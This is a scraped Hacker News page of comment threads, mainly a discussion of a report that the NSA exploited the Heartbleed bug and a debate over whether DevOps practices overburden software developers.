StavrosK 5 days ago 0 replies      
This is beautiful, it's one good idea after another, good job!
13
smortaz 6 days ago 1 reply      
fantastic. with your permission, i'd love to use this to demo python!
14
peapicker 6 days ago 0 replies      
This is really nice, thanks for sharing it with us.
15
cdelsolar 5 days ago 0 replies      
So, so cool. I love posts like this.
16
evidencepi 6 days ago 0 replies      
Nice post, thanks for sharing!
29
NSA Said to Exploit Heartbleed Bug for Intelligence for Years bloomberg.com
294 points by taylorbuley  6 days ago   174 comments top 40
1
spenvo 6 days ago 0 replies      
Here we observe a side effect of the NSA/GCHQ operating in a manner which always gives offensive capability precedence over the defense of civilian systems.

In case you haven't made the time yet -- ACLU's interview of Snowden at SXSW was excellent and dives into the implications of this: https://www.youtube.com/watch?v=UIhS9aB-qgU

On another (ironic) note this PSA from the US government is about 2 years late: http://www.bbc.com/news/technology-26985818

2
molecule 6 days ago 4 replies      
Bloomberg really puts its bias on display:

> The Heartbleed flaw, introduced in early 2012 in a minor adjustment to the OpenSSL protocol, highlights one of the failings of open source software development.

And its discovery and resolution highlights one of the advantages of open-source software development.

3
danenania 6 days ago 1 reply      
I don't know if Heartbleed could reach this point, but I think probably the only possibility for getting average citizens up in arms about this kind of thing is for them to start seeing major personal detrimental effects (like oops, all my email has been stolen and deleted and my bank account's empty), and then learn that the NSA could have easily prevented it if they weren't having so much fun being super-hackers instead.
4
jobu 6 days ago 2 replies      
This looks like another case where the actions of the NSA are the opposite of what's in the best interest of US Citizens.
5
JackC 6 days ago 0 replies      
I've been seeing a lot of comments recently along the lines that we "need" more evidence before we assume that the NSA took advantage of heartbleed. I don't get that at all.

I'd love to have harder evidence of what the NSA has been up to. I get that. But here are some things we know: the NSA believes its mission is to collect 100% of the world's data, with the possible exception of data that definitely belongs to US citizens. The NSA has boasted internally of cracking SSL implementations as part of its work. The NSA employs more people who are qualified for and tasked with finding this kind of exploit than anyone else. The NSA's leadership is willing to lie under oath to Congress -- let alone to anyone else -- about its activities. The NSA's secrets are about as heavily defended as secrets can be -- actually providing the kind of evidence requested here is widely considered treason against the United States. And now an investigative reporter with a serious reputation says that he has two sources who can confirm that the NSA knew about heartbleed shortly after it was created.

So let's assume you might behave differently in some way -- in any way -- if the NSA knew about and exploited heartbleed. You have imperfect information and you have to make a call. What else could you "need" before you decide to behave as though this article is accurate?

I think we "need" to assume that the NSA took advantage of heartbleed starting shortly after it was introduced. We'd just "like" to have a little more confirmation about what the hell they've been up to.

6
mindstab 6 days ago 1 reply      
Evidence? And if so, pretty much what we expected and exactly why this behaviour is terrible
7
tptacek 6 days ago 1 reply      
Yeah, that's not good.
8
jostmey 6 days ago 1 reply      
The NSA protected us by not disclosing to us a serious security vulnerability in our software. It is hard for me to wrap my brain around reasoning of the intelligence agencies.
9
mschuster91 6 days ago 2 replies      
No fucking way. This is disastrous PR stuff, second only to the Snowden revelations.

It should be clear by now that the NSA does not restrict themselves from anything... and should be disbanded.

10
bhousel 6 days ago 1 reply      
Whether it's true or not, I think the correct thing for the NSA to do would be to say that they knew about it for years and exploited it. That is their job, after all.
11
antonius 6 days ago 0 replies      
Good luck trying to wiggle out of this one, NSA.
12
mcculley 6 days ago 0 replies      
This is according to "two people familiar with the matter". While nobody would be surprised that the NSA had exploited heartbleed, this article gives no compelling proof.

I wish newspaper articles had a bit of metadata that indicated whether the sources are verifiable. Then we wouldn't have to waste any time reading them when they aren't.

13
ArtDev 6 days ago 0 replies      
It flies in the face of the agency's comments that defense comes first

The NSA needs to be dissolved. It is a costly liability whose actions work against the nation's interests as a whole.

14
jrochkind1 6 days ago 1 reply      
> The agency found the Heartbleed glitch shortly after its introduction, according to one of the people familiar with the matter,

Presumably if the anonymous sources here were discovered, they'd be in big criminal trouble, right? I am curious how far the government goes to try and discover them.

And I think there is no way these anonymous sources would have contacted the journalists without Snowden going first, to establish the context and interest. Snowden's actions continue to benefit us all, cascading.

15
taylorbuley 6 days ago 1 reply      
The NSA is denying this report.

> Statement: NSA was not aware of the recently identified Heartbleed vulnerability until it was made public.

https://twitter.com/NSA_PAO/status/454720059156754434

16
lawnchair_larry 6 days ago 0 replies      
It's going to be pretty hard to say you're playing "defense" with a straight face after this one.
17
thefreeman 6 days ago 0 replies      
So is there a single shred of evidence besides something unquoted by `two people familiar with the matter said`

because if not this is just straight up link bait.

18
higherpurpose 6 days ago 0 replies      
This is how NSA "protects America" and its infrastructure from "cybercrime" - by allowing a bug like this to exist for years without telling anyone about it.

I hope it's now clear to everyone what NSA's vision about "cybersecurity" is. They think having vulnerabilities like this in the Internet's infrastructure is a good thing, because then they get to attack their "targets", to "protect us". It has nothing to do with actual security. Weakness is strength. Vulnerability is security.

19
ChrisLTD 6 days ago 0 replies      
The US government seems intent on destroying the viability of the Internet as a commerce platform.
20
jrochkind1 6 days ago 1 reply      
> The SSL protocol has a history of security problems, Lewis said, and is not the primary form of protection governments and others use to transmit highly sensitive information.

> I knew hackers who could break it nearly 15 years ago, Lewis said of the SSL protocol.

Anyone know wtf he's talking about?

21
humancontact 6 days ago 0 replies      
> two people familiar with the matter said

As much as Snowden has shown us the amount of effort NSA puts into this kind of stuff, I think we need more evidence than this article is giving.

22
malandrew 6 days ago 0 replies      
A reasonable policy upon discovering this type of bug is to allow the agency a fixed period of time to exploit the bug and then require that they provide support in fixing the bugs for as many major US companies and institutions as possible as quickly as possible.

If they are given carte blanche to use the exploit indefinitely, they will keep it forever and let the world discover and exploit it as well. If they have a finite time period like 1-3 months, they will prioritize exploiting those systems that are actually valuable for national security. While they are doing so, they should keep an auditable log of all the systems they use the exploit against so that oversight may be performed in hindsight. Furthermore, they should absolutely be barred from using any exploit against a target with a US-based IP, or possibly even any IP address in allied nations.

It is far less likely that the agency will have the opportunity to abuse exploits if they are forced to prioritize targets due to a fixed deadline on disclosure.

During the deadline period, they should also be working on a plan that minimizes the amount of damages once disclosure is forced. i.e. there should be a list of people and companies that get the information first and everyone on the list should be people in charge of protecting computer systems (i.e. no one involved in offensive activities is on the list). Companies like Google, Facebook, Akamai, Apple and the package maintainers for all the major *nix distros should be on that shortlist of those that get priority notification.

23
zacinbusiness 6 days ago 0 replies      
While there's no evidence (yet) that the NSA knew about or exploited this bug, I would not be the least bit surprised if they did. Honestly, my first thought when reading about Heartbleed was "I wonder how much the NSA paid the contributor. Or did they just threaten his family?" It seems there have been a lot of "oops" errors being found in critical security systems these days, and every single one of them is directly beneficial to the NSA and its mission to "h4ck the plan37!"
24
protomyth 6 days ago 2 replies      
I'm wondering if any State Attorney Generals are tech savvy, don't like the current administration, and want some publicity[1] enough to start an investigation? I would imagine a subpoena asking for the financial records of the OpenSSL contributors would be a first step (to find Gov payments). I can see a very scary witch hunt.

1) that part might be a little rhetorical, every AG likes good publicity.

25
lauradhamilton 6 days ago 1 reply      
It certainly seems believable, but do we have anything more concrete to go on than "two people familiar with the matter?" Is that even two people with top-secret clearance at the NSA?
26
stcredzero 6 days ago 1 reply      
Your friends tell you about your flaws and shortcomings. The people who keep quiet or even exploit your flaws? They are not your friends.

So, what's to keep some organization that runs a package repo from publishing OpenSSL packages that claim to be like OpenSSL 1.0.1g but actually display the heartbleed bug? I also ask myself, would the NSA seek to implement such a thing? They would, though that is an entirely different question from if they have.

27
devindotcom 6 days ago 0 replies      
FWIW, we asked the NSA and NSC; both deny:

http://www.nbcnews.com/tech/security/nsa-denies-it-used-hear...

28
schrodingersCat 6 days ago 0 replies      
I hesitate to believe that in 2 years time, the agency hasn't found another backdoor to the web. OpenSSL might be patched, but what else is still vulnerable?
29
otterley 6 days ago 0 replies      
I've never understood theories about NSA capability. Everyone complains that Government officials are barely competent, if at all, yet when it comes to NSA, those same people think NSA staff is at least ten times as brilliant as the general population.

Everything I've seen NSA do is largely based on the same techniques Google uses, except 10 years later, much more expensively, and with much uglier PowerPoint presentations. The only thing NSA has that private organizations don't is the compelled cooperation of telecom companies.

30
dsugarman 6 days ago 0 replies      
What upsets me the most is that they knew this existed, and that a lot of the US economy relies on our tech companies, and they did nothing to inform the companies about the security flaw.
31
anonbanker 6 days ago 2 replies      
Now would be the time to start looking up the backgrounds of the people who implemented heartbeat support. For instance, the same guy responsible for the Heartbeat spec was the author of the OpenSSL implementation.

While we do not want to make this into a witch hunt, now that the NSA is involved in Heartbleed, we should definitely rule out malice by checking for direct ties between contributors of known flawed/malicious code related to the implementation of Heartbeat.

32
smegel 6 days ago 1 reply      
> highlights one of the failings of open source software development.

Sorry? Paid programmers writing closed code with probably less review and auditing have been shown to create less bugs? What are they trying to say?

33
tzs 6 days ago 0 replies      
> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug [...]

Interesting that they say "at least" two years. The bug is two years old, so they could have also chosen to say "at most" two years or "up to" two years. Least biased would be to just say "since the bug was introduced, two years ago".

34
forgotAgain 6 days ago 0 replies      
Sounds plausible to me. I would think the NSA, and other spy agencies, pore over every release of a security package to see if any exploitable errors were made.
35
leeoniya 6 days ago 0 replies      
s/Flawed Protocol/Flawed Implementation/
36
err4nt 6 days ago 3 replies      
Do we have anything that leads us to believe the NSA was aware of heartbleed at all before we found out, other than speculation because of their resources?
37
dombili 6 days ago 6 replies      
My first thought: if this is the case, then why did they try so hard (and get "trolled" in the process) to get the SSL keys from Lavabit?
38
higherpurpose 6 days ago 0 replies      
Well this was flagged fast.
39
abdullahkhalids 6 days ago 0 replies      
You can assume that any bug in open source software that could have been found using systematic and automated analysis has already been found by the NSA.
40
muyuu 6 days ago 1 reply      
This is flamebait. Sad it's getting so many upvotes.
30
How 'DevOps' Is Killing The Developer jeffknupp.com
291 points by jknupp  2 days ago   203 comments top 67
1
NickPollard 2 days ago 23 replies      
DevOps isn't about making Developers be Ops guys. It's about the fact that automation eats everything, and a significant part of 'ops' is now coding.

A DevOps person isn't someone who develops, and who does Ops. It's someone who does only Ops, but through Development.

It's not about start ups vs Enterprise, it's about 1 person writing programs or 5 people doing things by hand.

2
maratd 2 days ago 4 replies      
The market is maturing. Take a look at a market that is similarly structured. Look at construction.

You have general contractors and then you have subs that work under them. A general contractor is a jack of all trades, master of none. Exactly what a full stack developer is.

This isn't the end of specialization. It's the beginning of project management steered by developers who intimately understand all of the work involved, even if they aren't as competent as the specialists.

Having a team consist of all full-stack developers is just stupid. Having a full-stack developer as the head on a project, with specialists on the team, is a great idea.

3
stiff 2 days ago 2 replies      
You can't really draw a hard line between administration and development, in the end you are just building a system and the more you know about it from all angles the better design decisions you can make and the easier it is to fix issues.

I diagnosed a few problems over the years that arose as apparent issues with a web application but that I gradually narrowed down to things like network issues, or kernel bugs, or system misconfiguration, or database issues etc. Modern stacks are very complicated and the interactions can get really messy, it is close to impossible for someone who doesn't understand the whole thing to find issues that aren't neatly isolated. I perfectly know that I do not have the full qualifications of a sys-admin proper, and would not like to do a sys-admin job full time, but in those particular cases a pure sys-admin would not (and often actually could not) find those issues. As an example, I can remember many situations where the application showed different behaviour depending on which application server you hit, and typically both "pure" developers and "pure" sys-admins were having a hard time finding the issue.

Good sys-admins anyway have to learn, at least, C programming, shell scripting, and network protocols and programming, so it should not be a big deal to add some Rails/Django/Node to their skillset. Good developers anyway have to know things about hardware, networks, protocols and so forth. You do want to have people that are specialized in one or the other area and focus on it on a day to day basis, but you also do want to have people that can understand a particular aspect of the system top to bottom when such a need occurs, and it does happen quite often.

4
hibikir 2 days ago 0 replies      
Pure developers are a problem because they will the information do their job well.

I go back a few years, to an old, waterfall-like job. I was handed work by an analyst, that was handed a task to analyze by an engagement lead, who might at some point talk to someone using the application. The work was always handed out on time, but the product often failed, not because it was buggy, but because nobody actually had much of an idea of what we were really trying to solve.

So us developers got much work done, but the work didn't actually solve real problems: The force is applied to the wrong vector. Then the product fails, and the blame game begins: Changes are too expensive, because the developers didn't know what the real invariants are. Queries are slow, because the database architect wasn't told about the questions that the database had to answer. The business analysis just wrote documents. It was all a big catastrophe.

That company moved to Scrum, the terrible way: Here, have this self organizing team full of specialists that don't know anything outside of their domain. They are still failing to this day, but now they blame each other in retrospectives.

So I'd much rather be stuck coding less, but then being aware that my code is actually solving a problem for someone, than just writing castles in the sky, because everything I've been told about what my userbase needs comes from a game of telephone.

5
rb2k_ 2 days ago 4 replies      
I think the idea is not necessarily to have developers run production systems, but they still should know what production looks like and at least have basic knowledge on how to configure all of the moving parts of the system.

Having developers be 'full stack' imho reduces the amount of "works on my machine". How would a developer test the software he/she is developing on if she can't at least get close to a production environment.

Automated provisioning is just one of the usual 'devops' things that I can't imagine how a proper software engineering process would work without.

I would say that at least 20% of the people I graduated with can create software that works mostly ok when they hit the little green "run" icon in Eclipse. They were however incapable of figuring out why their jar file doesn't work in tomcat on a linux server somewhere.

Usually it was because they're using a local database with root credentials instead of a remote Database with multiple users, they have some file stashed away somewhere in their classpath, they have some binary installed in $PATH that makes the whole thing work.

I think just wanting to be a developer and not know about the stack that your application runs on is like being a painter but refusing to buy paint because you can't see what going to the store has to do with painting.

6
beat 2 days ago 0 replies      
As someone who has been doing DevOps for 20 years, since long before it was called "DevOps"...

First, DevOps has degenerated into a meaningless buzzword to rival "Agile", despite the good ideas and good intentions. Every day, I have recruiters looking for "DevOps". A couple of years ago, they'd never heard the word.

Second, DevOps is actually getting strongly biased toward Ops, often to the exclusion of Dev. In the eyes of recruiters and much of the industry, it's become synonymous with "Chef/Puppet/Ansible automation", a set of automation tools. That's stupid.

Third, and this is what matters to me... DevOps is (or was meant to be/should be) more about organizational structure than skills. As the author points out here, specialization is good and necessary. But specialization comes with bureaucratic compartmentalization that makes working across org boundaries very difficult. When you have to climb four or five (or more) layers up the org chart to find common management for both the dev and ops sides of a project, then the dev team has no authority over and very little way to communicate with ops, and vice versa. For most large organizations, the dev/ops separation is necessary - developers get locked out of production systems to keep them from legal exposure to customer data (HIPAA, PII, etc), and to keep them from accidentally or intentionally altering production in a way that it might break.

Read Gene Kim's excellent quasi-fiction book, The Phoenix Project. It covers a lot of the issues of DevOps as fixing communication patterns in large organizations. You'll see how little of it is about tooling or "full-stack", and how much is about clearing bureaucratic obstacles to effective communication.

7
leccine 2 days ago 0 replies      
The guy is missing the point by 10000 miles. DevOps is about getting together with devs and focusing on best practices from day one. Keep in mind that you need to deploy your software in a timely, reliable manner, that is going to run on a network of computers, where part of your system might be down or showing elevated latency. I could not believe how non-trivial these things were until I saw with my own eyes that most of the software out there still has the following assumptions: zero latency network with unlimited bandwidth, uptime for servers is 100%, memory and CPU is something you can keep adding to computers. My experience is that when people are talking about DevOps what they really mean is site reliability or systems engineers, people who understand networks and operating systems in depth and can read and write code, yet their primary focus is not to deliver customer facing services, more like developing tools which can improve deployments, automate error prone processes and optimize/tune operating systems for better performance. My humble opinion is that developers should be aware of the architecture of the system they are writing software for, but it seems we need another breed of engineers who are more focused on that as of today. Let's call them DevOps... :
8
dsjoerg 2 days ago 1 reply      
"All too common a question now, can you imagine interviewing a chef and asking him what portion of the day he actually devotes to cooking?"

Yes. Chefs also do shopping, menu planning, prep, hiring, firing, marketing, and schmoozing with patrons. Source: I know a chef.

9
pnathan 2 days ago 2 replies      
This article is pretty ignorant.

I don't think most developers have the capability to be sysadmins or QA. Vice versa, too, quite often. Joe developer ain't that special.

Devops is about moving the infrastructure into its own configuration-managed artifact, taking lessons from programming and computer science, and coming out with its own engineering rigor.

If you want your devs to operate builds/infrastructure/etc/etc, that's fine, but devops that ain't. That's called "many hats".

10
lmm 2 days ago 0 replies      
I found it very interesting that Facebook apparently hired programmers for all its roles in the early days - even e.g. the receptionist. I think the point that this article misses is that a 'devops' person - that is to say, someone with both sysadmin and development skills, whichever side of the fence they originated on - can do the job better than someone who is "just a sysadmin" and incapable of programming. When you look at modern ops infrastructure like Puppet, you're looking at programs, written in programming languages, and it's foolish to pretend otherwise. So like it or not, you need to hire someone who can program to manage it. If you imagine you can get a cheaper non-technical ops person to handle this and save money, you're going to get inferior results.

I think this is going to happen to more and more careers. Already a profession like surgery or piloting a modern airliner is starting to require some of the skills we think of as programming. Software is eating the world - that doesn't make domain expertise irrelevant, but it means you need people with domain expertise and programming skills. That applies to non-programming roles in the software industry just as it applies to other industries.

11
ef4 2 days ago 0 replies      
The author is missing the fact that good developers can actually automate away a lot of those "lower on the totem pole" roles, or at least reduce the amount of repetitive stuff down to the point where the remaining work is quite abstract and basically just more programming.

This isn't counter to specialization -- in a big organization, people are certainly still going to specialize. But the "DBA" equivalent people are just programmers who have fresh expertise on the storage layer, and the "QA" people are just programmers who have expertise on the automated build and test systems.

The dentist analogy doesn't hold in software. A dentist handling secretarial work is just an expensive waste of time, due to comparative advantage. But a programmer replacing secretarial work with automation often reaps big long-term dividends.

12
gatehouse 2 days ago 0 replies      
This is an interesting rant. I had never seen DevOps as being "for" developers. My impression has always been that it is sysadmins quest for a high degree of automation and streamlining that allows them to manage hundreds of systems without waking up in the middle of the night sweating. And when you're looking for a sophisticated tool to control something, you inevitably find yourself writing software.
13
digisth 2 days ago 0 replies      
It's definitely more complicated than the post implies, and it most definitely is NOT only for startups. Soon after I started out - at a mature company already making plenty of money - I was a full-stack engineer. There were a number of reasons:

- New development happened sporadically; day-to-day work was a mixture of maintenance development and admin work

- Culture. They started with a small team, and never grew it. Having more people didn't fit with the way the company saw itself.

- Difficulty hiring specialists. Various reasons for it, but still valid.

At another company I worked, there was a lot of "integration development", where your time was spent connecting various internal and external systems together, software-wise, developing tools that support systems work (i.e., tools for sysadmins), and developing other tools that are for end-users, but have a heavy systems component (management software for DNS, for example.) That meant understanding each part of the stack from both a development and system perspective. Another is interest level. A few of us were full-stack developers because we studied more than just development in our free time, and we took that with us to work. This wound up benefiting everyone. This also led to us being the go-to people (that is, the top level of internal support) for both more specialist internal developers and sysadmins, as we had deep knowledge of the internal systems from the bottom to the top of the stack, and the knowledge and experience to explain and troubleshoot problems to people in those other roles.

The author is correct in that this may be more /common/ at startups (the previous startup I worked at did in fact operate as the post describes), and is sometimes done out of necessity. It is by no means limited to those environments, however.

Edit: I'd also separate DevOps from full-stack engineer. They sound like the same thing, and if you squint from far enough away, they look like the same thing. The terminology may be fluid, but I think (as some other comments state), that DevOps is more centered around "coding for systems automation", whereas "full-stack engineering" is a much more general term which can encompass a variety of different types of tasks in different environments with varying levels of knowledge/experience in the different parts of the stack/tools.

14
headShrinker 2 days ago 0 replies      
Because of an abnormal learning style, severely dyslexic, I have never fit in to corporate environments. Looking past the egregious spelling errors, being a slow learner isn't a winning talent in a job interview. As a result, I've fallen into the trap of full stack (jack of all trades) developer consultant for a little over a decade now. I never got very good at anything in particular. Thus, I have battled with burnout for many years now, and am passively seeking another career outside of Internet technologies. Point of the article is close to home.

The burnout aside, there is a plus to someone being proficient at many related tasks; having a somewhat in-depth knowledge of how all these technologies come together. The point is not all jobs require the best, most expert techniques. As in the case of the jack-of-all-trades carpenter, as long as he knows when to call the specialist, he is still getting the jobs, as am I.

15
agentultra 2 days ago 0 replies      
I'm a terrible system administrator. Everything I've learned about it has come from necessity because startups. I don't want to be a system administrator and have no desire to be good at it. So I learn the minimum I need in order to get it to do what I need to do and hope that I've done it right.

I might only be slightly better than someone who's new to system administration only because I've written system-level code and understand operating systems and things of that nature.

However a good system administrator understands the entire architecture from a holistic point of view. They know the compiler switches to use, the run-time switches to tweak, the security implications of various configurations and all of the other details it takes to keep a cluster secure.

I often work well with a good system administrator to debug and optimize workloads due to the overlap in our skills. I find this to be the optimal relationship.

Learning and practicing system administration takes away from my ability to learn and be a better programmer (and the opposite is true as well). I don't know about most people but I find I can't be good at both. And I know which one I'd rather be better at (programming).

I don't think the author has hit the nail on the head but I agree that effective teams can't expect one person to manage an entire application from code to managing a secure deployment.

16
nailer 2 days ago 2 replies      
In my own experience I don't think developers were ever pushed to become devops (as the article asserts).

Instead, about 40% of what was called 'sys admins' were pushed to become devops. The 'sys admin who knew cfengine' became a 'devops person who knew ansible'. Deploys and cloud APIs just became another thing to automate.

The bottom 60% - the shit ones who got paid 120,000GBP to copy paste commands they didn't understand from word documents into Solaris 8 boxes in 2010 because they couldn't actually automate anything - left the industry.

17
ajdecon 2 days ago 0 replies      
DevOps is a rather overloaded term at the moment. I've seen it refer to any of the following:

- Encouraging collaboration between your Dev, Ops, and QA teams, with some cross-training so they can work together better

- Merging those teams under the same manager to try to improve that collaboration

- Making your developers responsible for all those roles, and never hiring a dedicated sysadmin or QA engineer

I personally think any of those is fine. Startups will err toward having fewer people and all of them be developers, while in a larger company it probably makes sense to specialize more and make "DevOps" mean close collaboration between those teams.

Of course, I've also seen "DevOps" as a job title for what would have previously been a "system administrator" or "site reliability engineer", and I have much less patience for that. :) Occasionally I see a job posting for a role that is actually dev + ops, but most often a "DevOps" posting means "we need a sysadmin, but we don't think sysadmins are cool enough to work here."

18
farmdawgnation 2 days ago 0 replies      
I'm not so sure your usage of the term "full-stack engineer" is accurate here. I consider myself full-stack, but I don't know half the stuff about Chef that our DevOps guy does and I'm ok with that. To me, a full-stack engineer means that I'm capable of coding both things that make magic happen in the browser and things that make magic happen on the server side of the application. It doesn't mean I'm a jack of all trades.

That said, I don't think that the increased prevalence of DevOps is bad. And I don't think it means "everyone is doing everything" either. It's a new role that is borrowing elements from both development and operations. Not one person doing both roles.

19
sev 2 days ago 0 replies      
I work at a large enterprise company and for a while I was part of the DevOps team as a software engineer.

Some of our goals included:

    - Building the continuous integration/delivery pipeline
    - Moving codebases from one source control system to another
    - Creating programs/systems to automate tagging of builds
    - Automating the deployment processes of multiple applications onto non-production servers
    - Implementing and maintaining the functional testing frameworks and server grids

The more I look at these goals, the more I realize that the developers who work on feature delivery should not worry about these anyway. So I disagree that DevOps is killing the developer. In fact, DevOps is helping the developers focus on what's important.

20
justizin 2 days ago 0 replies      
"The underlying cause of my pain? This fact: not every company is a start-up, though it appears that every company must act as though they were."

DevOps is not about startups, DevOps is about avoiding the pitfalls of big companies who completely fail and leave all of their employees jobless by focusing on all of the wrong decisions and initiatives.

It's about outlawing cowboy coding and other bad habits that people pick up as hobbyists, and intertwining business and technical objectives reasonably.

Why is a full-stack developer important? Why is eroding the difference in responsibility between Dev, Ops, and QA important? Because traditionally along these boundaries have been opportunities for individuals to absolve themselves of responsibility. More than anything, DevOps is about not living in that world anymore.

Some people won't survive outside that world. Those who want to will read "The Phoenix Project" by Gene Kim.

21
phamilton 2 days ago 0 replies      
I personally think DevOps is terribly misunderstood. I think the best way to describe DevOps is that it broke down the traditional Ops/QA/Developer roles into different roles, namely SRE, Platform Engineer, and Developer.

Developers take on the new responsibilities of being able to independently deploy their code, instrument and monitor stability and own test/QA.

Platform Engineering is about building a robust infrastructure and the tooling needed for Developers to handle the new responsibilities. This includes packaging, monitoring, deployment, AB testing, etc.

Site Reliability Engineering is about dealing with fires outside of the codebase. Hardware failures, network connectivity issues, etc.

I don't think any of these roles becomes a "Jack of all trades, master at none" situation. It does, however, cut out some of the more typical engineering roles. While developers just took on additional responsibilities, QA engineers and traditional Ops are forced to repurpose their skill set.

22
chronid 2 days ago 2 replies      
I don't really think a good developer can replace a good sysadmin. The reverse is true too, this is not a flamebait! :P

I don't see "DevOps" as a way to replace some roles - but as a way to make everyone work better together. Instead of living each in their own bubble (and in my - pretty limited I admit - experience it always) everyone has to know, at least a little, what someone else does. It really helps everyone at the end of the day. And the developer can keep coding without me screaming at him because he placed the database connection string in a configuration file that sits inside a .jar that sits inside a .war and so on.

23
Xylakant 2 days ago 0 replies      
I think DevOps is very much a web-application thing (where web-application includes intranets, ... basically anything that speaks tcp). I seriously see the need there. I still remember the days when developers would build an application that worked on their system and then handed it off to Ops, hoping to never hear back from it. I interviewed developers that could not tell me which webserver or application server their company was running in production, even though capabilities and performance characteristics differ wildly. The DevOps role is trying to bridge the gap, it's the jack of all trades, that knows enough of every piece of the system to debug issues that happen at those boundaries. Is this DB problem a machine issue, do we just need new hardware? Is it an application problem (n+1 queries) and where could those be? How can I structure my stack in a way to hand off tasks to the place where they can be solved efficiently. The implementation of those solutions can be handled by domain experts, but someone needs to keep all those pieces from breaking apart at the seams. In the web world, that's the DevOps.
24
nnq 2 days ago 0 replies      
Are any other companies besides (well funded) startups actually hiring people as "full stack developers"? I mean, yeah, it's normal to look for candidates with full stack experience, but not to hire them in an actual job position that requires them to do full-stack work... it's a big difference.

(sorry if the q is off topic, I don't really understand what OP is ranting about with the devops problems, so I'm referring to the only part of the article that makes any sense to me, that about the full-stack devs...)

25
Glyptodon 2 days ago 0 replies      
It's not so much that DevOps is killing the developer as it's the expectation that you can have your regular general purpose developers do your DevOps on the side.

I can relate to the downsides pretty well - I'm the only developer in my group and my job is mostly to develop web apps, but the IT side doesn't have much knowledge of modern tools - they live in the era 'just use Drupal and Apache' so I'm often the one who ends up having to figure out the deployment of the applications I work on (and also help with random problems from their OTB apps) and such.

To be honest, I don't mind when it's DB stuff because I'm pretty comfortable with it and have plenty of background with various SQL DBs, and it's not a time black hole, but when it comes to configuring servers and deployment I hate having to deal with the DevOps because there are so many pieces I never have the time to really become comfortable with them all and I feel very inefficient. Accomplishing something doesn't always take long itself, but it can require spending a day of reading wikis and documentation to accomplish something simple when you've got a lot of moving parts. And the worst part is that you have to deal with the DevOps bits so infrequently it's like you have to relearn them each time.

26
clone1018 2 days ago 2 replies      
"If you are a developer of moderately sized software, you need a deployment system in place. Quick, what are the benefits and drawbacks of the following such systems: Puppet, Chef, Salt, Ansible, Vagrant, Docker. Now implement your deployment solution! Did you even realize which systems had no business being in that list?"

I'm not understanding this, you can deploy with Puppet, Chef, Salt, Ansible, Vagrant and Docker. With Vagrant you can deploy a bare image and use Chef (or one of the others) or you can just deploy a fully setup box file (like with Docker).

27
cruise02 2 days ago 1 reply      
> ...the old "waterfall" develop-test-release cycle is seen as broken.

Waterfall is not just seen as broken, it was always broken.

28
dominotw 2 days ago 1 reply      
As someone who is moving into more of a devops role from a pure development role, here is my learning list so far.

1. The TCP/IP Guide: A Comprehensive, Illustrated Internet Protocols Reference. http://www.amazon.com/The-TCP-Guide-Comprehensive-Illustrate...

2. Advanced Programming in the UNIX Environment http://www.amazon.com/Programming-Environment-Addison-Wesley...

3. A systems programming language - I choose golang.

4. GDB/makefiles

5. SSH, The Secure Shell: The Definitive Guide: The Definitive Guide http://www.amazon.com/SSH-Secure-Shell-Definitive-Guide-eboo...

29
mncolinlee 2 days ago 0 replies      
I couldn't disagree more about his portrayal of DevOps. There are companies misusing any and all paradigms of development. Google "cowboy coding agile" to see what I mean.

When I think of DevOps, I don't think of having everyone know everything. Ops staff have to know enough code to write deployment automation scripts and dev staff need to know enough system administration to step up and help when the monitoring or deployment automation breaks.

It's meant to be a partnership to maintain a system rather than the old practice of throwing code over the wall. It really harms morale to have the developers all enjoying wonderful weekends while ops is on red alert because app changes they don't understand broke everything in production.

30
scottschulthess 1 day ago 1 reply      
Overspecialization is the source of organizational smells in a lot of medium-sized engineering companies - a lot of times it's better to have generalist engineers with some specializations in what you need to do than a bunch of specialists for a bunch of reasons, among them:

- (pure) Specialists often don't understand how their decisions affect other systems (and middle management or communication isn't always a solution)

- (pure) Specialists tie you to a particular technology when in reality you may need to evolve to use other technologies.

- If you need a bunch of different specialists to get something simple done (perhaps something you don't do all the time so don't have a process in place), just because they are siloed, it's a lot more complex and usually ends up badly designed (because it's harder to be iterative across teams). Generalists can get simple things done that require different skill sets to accomplish.

31
ltcoleman 2 days ago 1 reply      
From my point of view, this is due to lack of tech education. There just are not enough people graduating/learning the technical skills necessary for medium to large size software companies to employ.

I am a manager/developer/architect at a relatively large software company, and we have to task our developers with devops-type tasks constantly. Not because we want our developers spending time outside of coding, but for lack of ability to hire the competency needed.

As you stated, good developers can generally perform these tasks so when you have nobody lower to perform them they become a weight on the developers' shoulders.

No it isn't necessarily fair, and yes, I believe in the future specialization will come back as the education system starts to realize there are many jobs in tech, not just Comp Sci degree jobs.

32
mark_l_watson 2 days ago 0 replies      
+1 I don't agree, but an interesting article anyways.

I have worked with DBAs who had PhDs and could have still done development, but they moved past that to concentrate on schema development, scaling, etc. Toss into the mix modern programs of master data development inside organizations and people who are characterized as DBAs have a very sophisticated role.

Also, for small projects, devops makes all the sense in the world to me. Deeply understanding how an entire system works is valuable.

33
cparedes 2 days ago 1 reply      
IMO, Amazon gets 'DevOps' right. It's mostly just called 'ownership' over in Amazon. (source: I used to work in Amazon as a systems engineer)

You still have specializations - SDE's, systems engineers, DBA's, etc. However, if you write code and it ends up in production, you are responsible for the proper function of that code in production. As a friend of mine put it in terms of developers who don't want to be on-call: 'what, you don't trust the quality of your code?'

DevOps is simply a nicer way of just saying, "own your damn code." The corollary to this is that the organization must help you in getting to that state where you can effectively own your code - this means collaboration (so that you build maintainable systems) and building tools that enable fairly frictionless code ownership.

34
mattgreenrocks 2 days ago 1 reply      
Related: I'm curious if 'full-stack' devs find themselves making more money than 'half-stack' devs. After all, you're doing more as part of your job, and you're a chimera.

If not, then aren't you being taken advantage of?

35
georgebarnett 2 days ago 0 replies      
In the same way that being able to cook dinner doesn't make me a chef, while it's true that a developer can be a sysadmin, QA or DBA, they won't do a very good job.

To suggest otherwise shows a complete lack of understanding of the nuance of those roles.

As for suggesting that "DevOps" is killing the developer - the only thing "DevOps" is doing is polluting our common language with a term that doesn't actually mean anything concrete. It's perfect consultant speak.

36
paulbjensen 2 days ago 1 reply      
This article pretty much resonates with my experience, except that my employer (a 4 person established company) can't afford to hire a QA and sysadmin alongside my role as developer.

The bad side is that doing this DevOps role across multiple projects at the same time can lead to burnout, and I think I came close to that in the last few months.

The good side is that I've learnt a great deal about how to architect and deploy distributed web systems, how to do end-to-end testing, and how to effectively run the ops side of the business.

It's a mixed bag, and the burnout is the worst aspect of it, as well as the case where people are forced into situations where they are way in over their head.

37
jedmeyers 2 days ago 0 replies      
